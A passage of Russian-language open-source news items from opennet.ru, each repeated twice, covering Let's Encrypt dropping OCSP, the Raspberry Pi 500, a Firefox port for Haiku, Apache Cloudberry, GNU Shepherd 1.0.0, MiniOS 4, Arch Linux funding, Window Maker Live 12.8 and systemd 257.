В качестве причины прекращения поддержки OCSP упоминается забота о конфиденциальности. Использование OCSP приводит к тому, что при каждой установке защищённого соединения для проверки действия сертификата клиентская система отправляет запрос на OCSP-сервер удостоверяющего центра, сгенерировавшего сертификат. В ответ сервер предоставляет сведения о том, можно ли доверять указанному сертификату. Проблема в том, что удостоверяющий центр получает информацию о том, когда и какие сайты посещает пользователь в привязке к его IP-адресу, что может рассматриваться как утечка конфиденциальных данных. Кроме того, использование OCSP приводит к возникновению задержки на обработку запроса, требует наличия у пользователя гарантированного сетевого доступа и создаёт зависимость от бесперебойной работы OCSP-серверов.
Для решения проблем с конфиденциальностью при проверке отзыва сертификатов была разработана технология OCSP Stapling, суть которой в том, что заверенные удостоверяющим центром OCSP-ответы могут быть переданы обслуживающими сайты серверами во время согласования TLS-соединения с клиентом (передача сведений OCSP переносится на серверы сайтов, что избавляет клиентскую систему от прямого обращения к OCSP-серверу удостоверяющего центра, корректность же ответов обеспечивается цифровой подписью удостоверяющего центра).
В дополнение к OCSP Stapling существует добавляемое в сертификаты расширение "OCSP Must Staple", которое предписывает браузерам использовать технику OCSP Stapling вместо прямого обращения к OCSP-серверам и требует считать сертификат не заслуживающим доверия, если обслуживающий сайт сервер не вернул заверенный OCSP-ответ. К сожалению, расширение "Must Staple" не получило широкого распространения в браузерах, а технология OCSP Stapling завязана на необходимость явного включения поддержки на стороне HTTP-сервера (в nginx поддерживается с 2013 года).
При использовании CRL проверка отзыва сертификатов выполняется на локальной системе по спискам, формируемым удостоверяющим центром. Минусами такого подхода являются очень большой размер загружаемых данных и появление временного разрыва в актуальности информации (например, в Firefox данные актуализируются раз в 6 часов). Проблема с размером решена в браузерах через проксирование CRL на серверах производителей браузеров - в состав браузеров включается базовый CRL, которы в процессе работы периодически синхронизируется с актуальным списком (на систему клиента передаются лишь изменившиеся данные). Для снижения размера БД c CRL применяется вероятностная структура "фильтр Блума", позволяющая хранить полную базу CRL на стороне клиента. В Firefox подобная техника реализована при помощи инструментария CRLite, а в Chrome - CRLSets.
https://opennet.ru/62373/
Некоммерческий удостоверяющий центр Let's Encrypt, контролируемый сообществом и предоставляющий сертификаты безвозмездно всем желающим, принял решение прекратить поддержку протокола OCSP (Online Certificate Status Protocol), применяемого для проверки отзыва сертификатов. Вместо протокола OCSP предлагается использовать списки отозванных сертификатов (CRL - Certificate Revocation List), публикуемые сервисом Let's Encrypt начиная с 2022 года. 7 мая 2025 года Let's Encrypt отключит добавление ссылок на адреса OCSP в выдаваемые сертификаты и прекратит обработку запросов, связанных с использованием расширения "OCSP Must Staple". 6 августа 2025 года обработчики OCSP-запросов будут отключены на серверах.
В качестве причины прекращения поддержки OCSP упоминается забота о конфиденциальности. Использование OCSP приводит к тому, что при каждой установке защищённого соединения для проверки действия сертификата клиентская система отправляет запрос на OCSP-сервер удостоверяющего центра, сгенерировавшего сертификат. В ответ сервер предоставляет сведения о том, можно ли доверять указанному сертификату. Проблема в том, что удостоверяющий центр получает информацию о том, когда и какие сайты посещает пользователь в привязке к его IP-адресу, что может рассматриваться как утечка конфиденциальных данных. Кроме того, использование OCSP приводит к возникновению задержки на обработку запроса, требует наличия у пользователя гарантированного сетевого доступа и создаёт зависимость от бесперебойной работы OCSP-серверов.
Для решения проблем с конфиденциальностью при проверке отзыва сертификатов была разработана технология OCSP Stapling, суть которой в том, что заверенные удостоверяющим центром OCSP-ответы могут быть переданы обслуживающими сайты серверами во время согласования TLS-соединения с клиентом (передача сведений OCSP переносится на серверы сайтов, что избавляет клиентскую систему от прямого обращения к OCSP-серверу удостоверяющего центра, корректность же ответов обеспечивается цифровой подписью удостоверяющего центра).
В дополнение к OCSP Stapling существует добавляемое в сертификаты расширение "OCSP Must Staple", которое предписывает браузерам использовать технику OCSP Stapling вместо прямого обращения к OCSP-серверам и требует считать сертификат не заслуживающим доверия, если обслуживающий сайт сервер не вернул заверенный OCSP-ответ. К сожалению, расширение "Must Staple" не получило широкого распространения в браузерах, а технология OCSP Stapling завязана на необходимость явного включения поддержки на стороне HTTP-сервера (в nginx поддерживается с 2013 года).
При использовании CRL проверка отзыва сертификатов выполняется на локальной системе по спискам, формируемым удостоверяющим центром. Минусами такого подхода являются очень большой размер загружаемых данных и появление временного разрыва в актуальности информации (например, в Firefox данные актуализируются раз в 6 часов). Проблема с размером решена в браузерах через проксирование CRL на серверах производителей браузеров - в состав браузеров включается базовый CRL, которы в процессе работы периодически синхронизируется с актуальным списком (на систему клиента передаются лишь изменившиеся данные). Для снижения размера БД c CRL применяется вероятностная структура "фильтр Блума", позволяющая хранить полную базу CRL на стороне клиента. В Firefox подобная техника реализована при помощи инструментария CRLite, а в Chrome - CRLSets.
https://opennet.ru/62373/
Представлены моноблок Raspberry Pi 500 и монитор Raspberry Pi Monitor
Проект Raspberry Pi представил два новых продукта - компактный персональный компьютер Raspberry Pi 500, оформленный в виде моноблока c интегрированной клавиатурой, и 15.6-дюймовый монитор Raspberry Pi Monitor. В сочетании устройства позволяют получить полноценный персональный компьютер, основанный на технологиях
Raspberry Pi 5. Заявленная стоимость моноблока составляет $90, а монитора - $100.
В основу Raspberry Pi 500 заложен модифицированный вариант платы Raspberry Pi 5, поставляемый с 8 ГБ ОЗУ. Как и плате Raspberry Pi 5 моноблок Raspberry Pi 500 оснащён 4-ядерным 64-разрядным CPU Arm Cortex-A76 (SoC Broadcom BCM2712), работающим на частоте 2.4GHz, а также GPU GPU VideoCore VII 800MHz c поддержкой графических API OpenGL ES 3.1 и Vulkan 1.3, и встроенным аппаратным декодировщиком видео в формате HEVC/H.265, поддерживающим декодирование видео с качеством 4Kp60. Для вывода на экран предусмотрено 2 порта micro-HDMI с поддержкой качества 4Kp60. Из разъёмов также присутствуют 2 порта USB 3.0, один порт USB 2.0, Gigabit Ethernet, слот microSD и 40-пиновый GPIO. Имеется поддержка беспроводной связи (Wi-Fi 802.11b/g/n/ac 2.4GHz и 5GHz) и Bluetooth 5.0.
Жидкокристаллический монитор Raspberry Pi Monitor построен на базе технологии IPS, поддерживает разрешение Full HD (1080p, 1920 × 1080) и имеет два встроенных динамика, мощностью 1.2 Вт, а также 3.5 мм аудиовыход, кнопки управления яркостью и громкостью. Монитор можно разместить на столе при помощи встроенной подставке или закрепить на стену, используя типовой кронштейн VESA 100x100. Питание подаётся через обычный USB-порт (USB-C), что позволяет запитать экран напрямую с USB-порта платы Raspberry Pi (в этом случае максимальная яркостью будет ограничена до 60%, а звук до 50%).
https://opennet.ru/62374/
Проект Raspberry Pi представил два новых продукта - компактный персональный компьютер Raspberry Pi 500, оформленный в виде моноблока c интегрированной клавиатурой, и 15.6-дюймовый монитор Raspberry Pi Monitor. В сочетании устройства позволяют получить полноценный персональный компьютер, основанный на технологиях
Raspberry Pi 5. Заявленная стоимость моноблока составляет $90, а монитора - $100.
В основу Raspberry Pi 500 заложен модифицированный вариант платы Raspberry Pi 5, поставляемый с 8 ГБ ОЗУ. Как и плате Raspberry Pi 5 моноблок Raspberry Pi 500 оснащён 4-ядерным 64-разрядным CPU Arm Cortex-A76 (SoC Broadcom BCM2712), работающим на частоте 2.4GHz, а также GPU GPU VideoCore VII 800MHz c поддержкой графических API OpenGL ES 3.1 и Vulkan 1.3, и встроенным аппаратным декодировщиком видео в формате HEVC/H.265, поддерживающим декодирование видео с качеством 4Kp60. Для вывода на экран предусмотрено 2 порта micro-HDMI с поддержкой качества 4Kp60. Из разъёмов также присутствуют 2 порта USB 3.0, один порт USB 2.0, Gigabit Ethernet, слот microSD и 40-пиновый GPIO. Имеется поддержка беспроводной связи (Wi-Fi 802.11b/g/n/ac 2.4GHz и 5GHz) и Bluetooth 5.0.
Жидкокристаллический монитор Raspberry Pi Monitor построен на базе технологии IPS, поддерживает разрешение Full HD (1080p, 1920 × 1080) и имеет два встроенных динамика, мощностью 1.2 Вт, а также 3.5 мм аудиовыход, кнопки управления яркостью и громкостью. Монитор можно разместить на столе при помощи встроенной подставке или закрепить на стену, используя типовой кронштейн VESA 100x100. Питание подаётся через обычный USB-порт (USB-C), что позволяет запитать экран напрямую с USB-порта платы Raspberry Pi (в этом случае максимальная яркостью будет ограничена до 60%, а звук до 50%).
https://opennet.ru/62374/
Порт Firefox принят в состав официального репозитория ОС Haiku
Группой разработчиков ОС Haiku был подготовлен и принят к публикации первый общедоступный порт браузера Mozilla Firefox. Совместными усилиями в процессе подготовки порта были внесены изменения как в базовую систему, так и в другие используемые порты, например в прослойку Wayland для Haiku, подготовленную разработчиком x512.
Из-за отсутствия реакции со стороны Mozilla, которая запрещает использовать свои товарные знаки при сборке из исходного кода, отличного от оригинального, было принято решение о поставке браузера под альтернативным именем IceWeasel, которое ранее было выбрано проектом GNU для своего форка Firefox.
Причиной публикации готового порта для широкой публики стало обеспечение воспроизведения медиа, возможность вывода звука, а также поддержка JIT. Стоит отметить, что порт всё ещё носит экспериментальный характер и имеет известные проблемы, такие как графические артефакты, вызванные несовершенством прослойки Wayland, а также не поддерживает некоторые возможности, такие как WebRTC.
https://opennet.ru/62375/
Группой разработчиков ОС Haiku был подготовлен и принят к публикации первый общедоступный порт браузера Mozilla Firefox. Совместными усилиями в процессе подготовки порта были внесены изменения как в базовую систему, так и в другие используемые порты, например в прослойку Wayland для Haiku, подготовленную разработчиком x512.
Из-за отсутствия реакции со стороны Mozilla, которая запрещает использовать свои товарные знаки при сборке из исходного кода, отличного от оригинального, было принято решение о поставке браузера под альтернативным именем IceWeasel, которое ранее было выбрано проектом GNU для своего форка Firefox.
Причиной публикации готового порта для широкой публики стало обеспечение воспроизведения медиа, возможность вывода звука, а также поддержка JIT. Стоит отметить, что порт всё ещё носит экспериментальный характер и имеет известные проблемы, такие как графические артефакты, вызванные несовершенством прослойки Wayland, а также не поддерживает некоторые возможности, такие как WebRTC.
https://opennet.ru/62375/
Проект Cloudberry, развивающий форк СУБД Greenplum, принят в инкубатор Apache
Организация Apache Software Foundation приняла под своё крыло проект Cloudberry, развивающего форк распределённой СУБД Greenplum, которая после приобретения VMware компанией Broadcom была превращена в закрытый продукт. Проект Cloudberry был создан изначальными разработчиками Greenplum и основан на последней версии Greenplum с открытым исходным кодом. После ответвления проект был адаптирован для использования свежих выпусков PostgreSQL и дополнен усовершенствованными возможностями для предприятий.
Cloudberry помещён в инкубатор Apache, в котором будет выполнена подготовка инфраструктуры, проведён аудит лицензионной чистоты и проверка способности соблюдения принятых в сообществе Apache принципов разработки. В дальнейшем, как только проект покажет себя готовым для самостоятельного существования, не требующего дополнительного надзора, он будет переведён в число первичных проектов Apache.
СУБД Cloudberry представляет собой распределённую редакцию открытой СУБД PostgreSQL, оптимизированную для выполнения аналитических запросов над большими массивами данных (Data Warehouse). Для параллельной обработки данных применяется массово-параллельная архитектура (MPP, massively parallel processing), обеспечивающая масштабируемость хранилища до петабайтных размеров за счёт разделения данных на сегменты и задействования для их хранения и обработки кластера из группы серверов.
https://opennet.ru/62372/
Организация Apache Software Foundation приняла под своё крыло проект Cloudberry, развивающего форк распределённой СУБД Greenplum, которая после приобретения VMware компанией Broadcom была превращена в закрытый продукт. Проект Cloudberry был создан изначальными разработчиками Greenplum и основан на последней версии Greenplum с открытым исходным кодом. После ответвления проект был адаптирован для использования свежих выпусков PostgreSQL и дополнен усовершенствованными возможностями для предприятий.
Cloudberry помещён в инкубатор Apache, в котором будет выполнена подготовка инфраструктуры, проведён аудит лицензионной чистоты и проверка способности соблюдения принятых в сообществе Apache принципов разработки. В дальнейшем, как только проект покажет себя готовым для самостоятельного существования, не требующего дополнительного надзора, он будет переведён в число первичных проектов Apache.
СУБД Cloudberry представляет собой распределённую редакцию открытой СУБД PostgreSQL, оптимизированную для выполнения аналитических запросов над большими массивами данных (Data Warehouse). Для параллельной обработки данных применяется массово-параллельная архитектура (MPP, massively parallel processing), обеспечивающая масштабируемость хранилища до петабайтных размеров за счёт разделения данных на сегменты и задействования для их хранения и обработки кластера из группы серверов.
https://opennet.ru/62372/
Опубликован системный менеджер GNU Shepherd 1.0.0
Представлен системный менеджер GNU Shepherd 1.0.0 (бывший dmd), сочетающий возможности системы инициализации и инструментария для управления системными сервисами. Отмечается, что присвоение номера 1.0 после 21 года разработки ознаменовало признание готовности проекта и его соответствия требованиям к функциональности современных систем инициализации и сервисных менеджеров.
Проект развивается разработчиками дистрибутива GNU Guix System в качестве альтернативы системе инициализации SysV-init, поддерживающей зависимости. Управляющий демон и утилиты Shepherd написаны на языке Guile (одна из реализаций языка Scheme), который также используется для определения настроек и параметров запуска сервисов. Shepherd уже применяется в дистрибутиве GNU Guix System и нацелен также на использование в GNU/Hurd, но может работать в любой POSIX-совместимой ОС, для которой доступен язык Guile.
Shepherd выполняет работу по запуску и остановке сервисов, учитывая взаимосвязь между сервисами, динамически определяя и запуская сервисы, от которых зависит выбранный сервис. Shepherd также поддерживает определение конфликтов между сервисами и предотвращает их одновременное выполнение. Проект может использоваться как в роли основной системы инициализации (init c PID 1), так и в обособленном виде для управления фоновыми процессами отдельных пользователей (например, для запуска tor, privoxy, mcron и т.п.) с выполнением с правами данных пользователей.
Основные новшества в GNU Shepherd 1.0.0:
- Добавлена поддержка сервисов, периодически запускающих команды или код на языке Scheme по указанному расписанию.
- В команде "herd status SERVICE" реализован показ высокоуровневой информации о сервисах, такой как PID, команда и адреса на которых принимаются сетевые запросы, а также сводки недавно добавленных в лог сообщений. Кроме того, данная команда теперь показывает применимые к сервису пользовательские действия и информирует о наличии заменяющего сервиса, который будет применён после перезапуска текущего сервиса.
- Команда "herd status root" теперь не является синонимом "herd status" и отображает сведения о корневом процессе shepherd.
- Для платформы Linux предоставлена возможность перезапуска с использованием механизма kexec ("reboot --kexec") для замены ядра Linux без физической перезагрузки.
- Добавлен сервис log-rotation, отвечающий за периодическую ротацию логов и удаление устаревших логов.
- Добавлен сервис system-log, который можно использовать в качестве замены традиционной системы syslogd.
- Добавлен сервис timer для запуска команд в указанное время, по аналогии с утилитой "at". Например, "herd schedule timer at 07:00 -- mpg123 alarm.mp3".
- Добавлен сервис transient для запуска команд в фоне, по аналогии с утилитой systemd-run. Например, "herd spawn transient -d $PWD -- make -j4".
https://opennet.ru/62376/
Представлен системный менеджер GNU Shepherd 1.0.0 (бывший dmd), сочетающий возможности системы инициализации и инструментария для управления системными сервисами. Отмечается, что присвоение номера 1.0 после 21 года разработки ознаменовало признание готовности проекта и его соответствия требованиям к функциональности современных систем инициализации и сервисных менеджеров.
Проект развивается разработчиками дистрибутива GNU Guix System в качестве альтернативы системе инициализации SysV-init, поддерживающей зависимости. Управляющий демон и утилиты Shepherd написаны на языке Guile (одна из реализаций языка Scheme), который также используется для определения настроек и параметров запуска сервисов. Shepherd уже применяется в дистрибутиве GNU Guix System и нацелен также на использование в GNU/Hurd, но может работать в любой POSIX-совместимой ОС, для которой доступен язык Guile.
Shepherd выполняет работу по запуску и остановке сервисов, учитывая взаимосвязь между сервисами, динамически определяя и запуская сервисы, от которых зависит выбранный сервис. Shepherd также поддерживает определение конфликтов между сервисами и предотвращает их одновременное выполнение. Проект может использоваться как в роли основной системы инициализации (init c PID 1), так и в обособленном виде для управления фоновыми процессами отдельных пользователей (например, для запуска tor, privoxy, mcron и т.п.) с выполнением с правами данных пользователей.
Основные новшества в GNU Shepherd 1.0.0:
- Добавлена поддержка сервисов, периодически запускающих команды или код на языке Scheme по указанному расписанию.
- В команде "herd status SERVICE" реализован показ высокоуровневой информации о сервисах, такой как PID, команда и адреса на которых принимаются сетевые запросы, а также сводки недавно добавленных в лог сообщений. Кроме того, данная команда теперь показывает применимые к сервису пользовательские действия и информирует о наличии заменяющего сервиса, который будет применён после перезапуска текущего сервиса.
- Команда "herd status root" теперь не является синонимом "herd status" и отображает сведения о корневом процессе shepherd.
- Для платформы Linux предоставлена возможность перезапуска с использованием механизма kexec ("reboot --kexec") для замены ядра Linux без физической перезагрузки.
- Добавлен сервис log-rotation, отвечающий за периодическую ротацию логов и удаление устаревших логов.
- Добавлен сервис system-log, который можно использовать в качестве замены традиционной системы syslogd.
- Добавлен сервис timer для запуска команд в указанное время, по аналогии с утилитой "at". Например, "herd schedule timer at 07:00 -- mpg123 alarm.mp3".
- Добавлен сервис transient для запуска команд в фоне, по аналогии с утилитой systemd-run. Например, "herd spawn transient -d $PWD -- make -j4".
https://opennet.ru/62376/
Релиз MiniOS 4, дистрибутива для съёмных носителей
Доступен выпуск MiniOS 4.0.0, лёгкого модульного live-дистрибутива Linux, предназначенного для использования на съёмных USB-накопителях. Ключевой особенностью MiniOS является модульная архитектура, позволяющая создавать специализированные конфигурации, исключая ненужные компоненты и добавляя необходимые, для адаптации системы под конкретные задачи. В качестве основы используется пакетная база Debian 12. Предлагаемое по умолчанию графическое окружение основано на Xfce.
Среди изменений в четвёртой версии MiniOS:
- Для загрузки доступны только две редакции вместо шести: MiniOS Standard (i386, amd64, 656 МБ) и Toolbox (amd64, 838МБ).
- Новая редакция Toolbox - многофункциональный инструмент для системных администраторов с большим набором утилит для обслуживания ПК и восстановления данных.
- Редакция Standard (для amd64) теперь содержит дополнительные драйверы для беспроводных адаптеров и драйверы для современных звуковых карт Intel.
- Значительно переработано и улучшено визуальное оформление.
- Улучшены все инструменты MiniOS для настройки системы и создания модулей.
- Множество изменений, направленных на повышение удобства работы пользователей.
https://opennet.ru/62377/
Доступен выпуск MiniOS 4.0.0, лёгкого модульного live-дистрибутива Linux, предназначенного для использования на съёмных USB-накопителях. Ключевой особенностью MiniOS является модульная архитектура, позволяющая создавать специализированные конфигурации, исключая ненужные компоненты и добавляя необходимые, для адаптации системы под конкретные задачи. В качестве основы используется пакетная база Debian 12. Предлагаемое по умолчанию графическое окружение основано на Xfce.
Среди изменений в четвёртой версии MiniOS:
- Для загрузки доступны только две редакции вместо шести: MiniOS Standard (i386, amd64, 656 МБ) и Toolbox (amd64, 838МБ).
- Новая редакция Toolbox - многофункциональный инструмент для системных администраторов с большим набором утилит для обслуживания ПК и восстановления данных.
- Редакция Standard (для amd64) теперь содержит дополнительные драйверы для беспроводных адаптеров и драйверы для современных звуковых карт Intel.
- Значительно переработано и улучшено визуальное оформление.
- Улучшены все инструменты MiniOS для настройки системы и создания модулей.
- Множество изменений, направленных на повышение удобства работы пользователей.
https://opennet.ru/62377/
Фонд Sovereign инвестировал 562 тысячи евро в модернизацию управления пакетами в Arch Linux
Разработчики дистрибутива Arch Linux объявили о получении инвестиций в размере 562 тысяч евро от фонда STF (Sovereign Tech Fund), учреждённого в Германии для стимулирования развития открытой цифровой инфраструктуры и экосистем с открытым исходным кодом. Фонд создан на средства, предоставленные Министерством экономики и защиты климата Германии, и курируется Федеральным агентством подрывных инноваций SPRIND. Средства выделены на проведение работы по модернизации инструментария управления пакетами ALPM (Arch Linux Package Management), развивающего спецификации, утилиты и библиотеки для решения таких задач, как создание и использование пакетов, а так же управление репозиториями.
В рамках проекта предпринята попытка структурирования интерфейсов, связанных с управлением пакетами, и предоставления утилит и обвязок, написанных на языке программирования Rust. Развиваемые проектом спецификации и утилиты основываются на функциональности Pacman. Переход на язык Rust после использования языка Cи в Pacman объясняется желанием снизить вероятность совершения ошибок при работе с памятью. В качестве цели инициативы заявлена интеграция в ALPM поддержки всех возможностей по управлению репозиториями и созданию/проверке/установке пакетов, а также предоставление функциональности, способной заменить некоторые возможности пакетного менеджера Pacman.
Выделенные средства планируется потратить на финансирование работы 4 разработчиков над проектом ALPM в режиме неполного рабочего дня на протяжении 15 месяцев. Работа стартовала в октябре и продлится до конца 2025 года. Среди задач, которые планируют решить в рамках проводимой работы, упоминаются:
- Создание формальных спецификаций для форматов данных, используемых в пакетах. В текущем виде в пакетах Arch Linux используются недокументированные или плохо документированные типы файлов и метаданных. Информацию о низкоуровневой структуре пакетов намерены обобщить в виде версионированных спецификаций, явно регламентирующих все типы допустимых файлов и метаданных.
- Внедрение упрощённого механизма верификации артефактов пакетов по цифровым подписям, основанного на использовании OpenPGP, но не завязанного на старое централизованное хранилище ключей GnuPG.
- Предоставление Rust-библиотеки для создания, верификации и установки отдельных пакетов, соответствующих требованиям формальных спецификаций, явно определяющих допустимое содержимое пакетов и методы для их создания и обработки.
- Предоставление Rust-библиотеки для управления пакетами в системе (обработки состояния набора пакетов, составляющих начинку системы).
- Подготовка независимого от дистрибутивов стека OpenPGP для верификации артефактов дистрибутива, поддерживающего PGPKI (Web of Trust). Вместо GnuPG планируют использовать альтернативы на языке Rust.
https://opennet.ru/62378/
Разработчики дистрибутива Arch Linux объявили о получении инвестиций в размере 562 тысяч евро от фонда STF (Sovereign Tech Fund), учреждённого в Германии для стимулирования развития открытой цифровой инфраструктуры и экосистем с открытым исходным кодом. Фонд создан на средства, предоставленные Министерством экономики и защиты климата Германии, и курируется Федеральным агентством подрывных инноваций SPRIND. Средства выделены на проведение работы по модернизации инструментария управления пакетами ALPM (Arch Linux Package Management), развивающего спецификации, утилиты и библиотеки для решения таких задач, как создание и использование пакетов, а так же управление репозиториями.
В рамках проекта предпринята попытка структурирования интерфейсов, связанных с управлением пакетами, и предоставления утилит и обвязок, написанных на языке программирования Rust. Развиваемые проектом спецификации и утилиты основываются на функциональности Pacman. Переход на язык Rust после использования языка Cи в Pacman объясняется желанием снизить вероятность совершения ошибок при работе с памятью. В качестве цели инициативы заявлена интеграция в ALPM поддержки всех возможностей по управлению репозиториями и созданию/проверке/установке пакетов, а также предоставление функциональности, способной заменить некоторые возможности пакетного менеджера Pacman.
Выделенные средства планируется потратить на финансирование работы 4 разработчиков над проектом ALPM в режиме неполного рабочего дня на протяжении 15 месяцев. Работа стартовала в октябре и продлится до конца 2025 года. Среди задач, которые планируют решить в рамках проводимой работы, упоминаются:
- Создание формальных спецификаций для форматов данных, используемых в пакетах. В текущем виде в пакетах Arch Linux используются недокументированные или плохо документированные типы файлов и метаданных. Информацию о низкоуровневой структуре пакетов намерены обобщить в виде версионированных спецификаций, явно регламентирующих все типы допустимых файлов и метаданных.
- Внедрение упрощённого механизма верификации артефактов пакетов по цифровым подписям, основанного на использовании OpenPGP, но не завязанного на старое централизованное хранилище ключей GnuPG.
- Предоставление Rust-библиотеки для создания, верификации и установки отдельных пакетов, соответствующих требованиям формальных спецификаций, явно определяющих допустимое содержимое пакетов и методы для их создания и обработки.
- Предоставление Rust-библиотеки для управления пакетами в системе (обработки состояния набора пакетов, составляющих начинку системы).
- Подготовка независимого от дистрибутивов стека OpenPGP для верификации артефактов дистрибутива, поддерживающего PGPKI (Web of Trust). Вместо GnuPG планируют использовать альтернативы на языке Rust.
https://opennet.ru/62378/
Выпуск дистрибутива Window Maker Live 12.8 с компонентами GNUstep
Опубликован дистрибутив Window Maker Live 12.8, предлагающий пользовательское окружение на основе оконного менеджера
Window Maker 0.96 с интерфейсом в стиле NEXTSTEP. В состав входят компоненты GNUstep, которые помещены в отдельное подменю GNUstep Apps. Некоторые приложения пересобраны с использованием библиотек GNUstep, например, с ними собран текстовый редактор Emacs 29.4. Для работы с электронной почтой поставляется основанный на GNUstep почтовый клиент GNUmail, а в качестве альтернативы доступен Claws Mail. Для работы с Web поставляются браузеры Pale Moon, Otter и WebSurf. Сборки подготовлены для архитектур x86_64 и i386 (3 ГБ).
В новой версии:
- Системное окружение синхронизировано с Debian 12.8.
- Поставляемые в Debian 12 версии пакетов c GNUstep заменены на новые версии из Debian Testing.
- Улучшена интеграция программ GNUstep с рабочим столом.
- В сборках для архитектуры x86_64 задействовано ядро Linux 6.11.5, а для i386 - 6.10.11.
- Добавлены приложения для оцифровки книг и создания электронных книг (scantailor-advanced, ocrmypdf, tesseract-ocr и Sigil), а также некоторые компоненты TeX Live и дополнительные утилиты, такие как дополнения AUCTeX к Emacs и vim-latexsuite к Vim.
- Браузер Surf заменён на Otter. Дополнительно добавлен браузер WebSurf.app с вариантом Netsurf, переведённым на библиотеки GNUstep.
- В дополнение к эмулятору QEMU в состав включены эмуляторы 86Box (эмулятор старых x86-систем) и Previous (эмулятор платформы NeXT, позволяющий запускать старые системы NeXTSTEP и OPENSTEP, собранные для архитектуры m68k).
- Собственная сборка библиотек GTK3 (gtk3-classic) заменена на стандартные библиотеки GTK3 из репозитория Debian.
- Специфичные для Window Maker Live компоненты вынесены в отдельный репозиторий "wmlive.rumbero.org/repo" и теперь могут быть установлены
в штатных окружениях Debian 12.
https://opennet.ru/62379/
Опубликован дистрибутив Window Maker Live 12.8, предлагающий пользовательское окружение на основе оконного менеджера
Window Maker 0.96 с интерфейсом в стиле NEXTSTEP. В состав входят компоненты GNUstep, которые помещены в отдельное подменю GNUstep Apps. Некоторые приложения пересобраны с использованием библиотек GNUstep, например, с ними собран текстовый редактор Emacs 29.4. Для работы с электронной почтой поставляется основанный на GNUstep почтовый клиент GNUmail, а в качестве альтернативы доступен Claws Mail. Для работы с Web поставляются браузеры Pale Moon, Otter и WebSurf. Сборки подготовлены для архитектур x86_64 и i386 (3 ГБ).
В новой версии:
- Системное окружение синхронизировано с Debian 12.8.
- Поставляемые в Debian 12 версии пакетов c GNUstep заменены на новые версии из Debian Testing.
- Улучшена интеграция программ GNUstep с рабочим столом.
- В сборках для архитектуры x86_64 задействовано ядро Linux 6.11.5, а для i386 - 6.10.11.
- Добавлены приложения для оцифровки книг и создания электронных книг (scantailor-advanced, ocrmypdf, tesseract-ocr и Sigil), а также некоторые компоненты TeX Live и дополнительные утилиты, такие как дополнения AUCTeX к Emacs и vim-latexsuite к Vim.
- Браузер Surf заменён на Otter. Дополнительно добавлен браузер WebSurf.app с вариантом Netsurf, переведённым на библиотеки GNUstep.
- В дополнение к эмулятору QEMU в состав включены эмуляторы 86Box (эмулятор старых x86-систем) и Previous (эмулятор платформы NeXT, позволяющий запускать старые системы NeXTSTEP и OPENSTEP, собранные для архитектуры m68k).
- Собственная сборка библиотек GTK3 (gtk3-classic) заменена на стандартные библиотеки GTK3 из репозитория Debian.
- Специфичные для Window Maker Live компоненты вынесены в отдельный репозиторий "wmlive.rumbero.org/repo" и теперь могут быть установлены
в штатных окружениях Debian 12.
https://opennet.ru/62379/
Выпуск системного менеджера systemd 257
После полугода разработки представлен релиз системного менеджера systemd 257. Ключевые изменения: новые утилиты systemd-sbsign и systemd-keyutil, поддержка MPTCP при активации по сокету, начальная поддержка сборки с Си-библиотекой Musl, утилита updatectl для управления установкой обновлений через systemd-sysupdate, возможность запуска сервисов в отдельных PID namespace, защита от случайного удаления файлов при использовании "systemd-tmpfiles --purge".
Среди изменений в новом выпуске:
- Добавлена новая утилита systemd-sbsign для заверения цифровой подписью исполняемых файлов в формате PE (Portable Executable), предназначенных для использования при загрузке в режиме EFI Secure Boot. Для формирования подписи могут использоваться движки и провайдеры, предоставляемые библиотекой OpenSSL. Systemd-sbsign может применяться в качестве альтернативы приложениям sbsigntool и pesign в утилите ukify при формировании универсальных образов ядра UKI (Unified Kernel Image), объединяющих в одном файле загрузчик для UEFI (UEFI boot stub), образ ядра Linux и загружаемое в память системное окружение initrd.
- Добавлена новая утилита systemd-keyutil, реализующая различные операции над закрытыми ключами и сертификатами X.509. Например, systemd-keyutil может использоваться для проверки возможности загрузки закрытых ключей и сертификатов, а так же извлечения из них открытых ключей в формате PEM.
- В unit-ах ".socket", используемых для обеспечения работы механизма активации по сокету (запуск процессов при попытке установки сетевого соединения), реализована поддержка MPTCP (Multipath TCP), расширения протокола TCP для организации работы TCP-соединения с доставкой пакетов одновременно по нескольким маршрутам через разные сетевые интерфейсы, привязанные к разным IP-адресам.
- В состав включены изменения, необходимые для сборки с использованием стандартной Си-библиотеки Musl.
- В различные компоненты systemd, выводящие индикаторы прогресса выполнения операций (например, systemd-repart, systemd-sysupdate/updatectl и importctl), добавлена возможность использования ANSI-последовательностей для анимирования отображения прогресса. Подобные последовательности пока поддерживаются только в Windows Terminal (предполагается, что со временем подобная возможность будет перенесена и в эмуляторы терминалов для Linux).
- Расширены возможности компонента systemd-sysupdate, применяемого для автоматического определения, загрузки и установки обновлений с использованием атомарного механизма замены разделов, файлов или каталогов (используются два независимых раздела/файла/каталога, на одном из которых находится текущий работающий ресурс, а на другом устанавливается очередное обновление, после чего разделы/файлы/каталоги меняются местами). На практике, systemd-sysupdate уже применяется в GNOME OS.
В дополнение к процессу systemd-sysupdate добавлен одноимённый сервис, позволяющий использовать D-Bus для управления обновлением системы непривилегированным пользователем. Для управления сервисом в состав также включена новая утилита updatectl. В systemd-sysupdate добавлен флаг "--offline" для запрета загрузки метаданных по сети и использования только уже загруженных на локальную систему версий. Для всех команд добавлена поддержка вывода в формате JSON.
- Для сервисов реализовано новое свойство "PrivatePIDs", при помощи которого можно организовать запуск процессов с PID 1 (init-процесс) в отдельном пространстве идентификаторов процессов (PID namespace). В создаваемом для запускаемого процесса окружении будут видны только процессы из созданного для него пространства имён.
- В правила udev добавлена поддержка сопоставлений без учёта регистра символов
(например, 'ATTR{foo}==i"abcd"'). Через udev реализовано предоставление непривилегированным локальным пользователям доступа ("uaccess") к устройству /dev/udmabuf, которое не...
https://opennet.ru/62380/
После полугода разработки представлен релиз системного менеджера systemd 257. Ключевые изменения: новые утилиты systemd-sbsign и systemd-keyutil, поддержка MPTCP при активации по сокету, начальная поддержка сборки с Си-библиотекой Musl, утилита updatectl для управления установкой обновлений через systemd-sysupdate, возможность запуска сервисов в отдельных PID namespace, защита от случайного удаления файлов при использовании "systemd-tmpfiles --purge".
Среди изменений в новом выпуске:
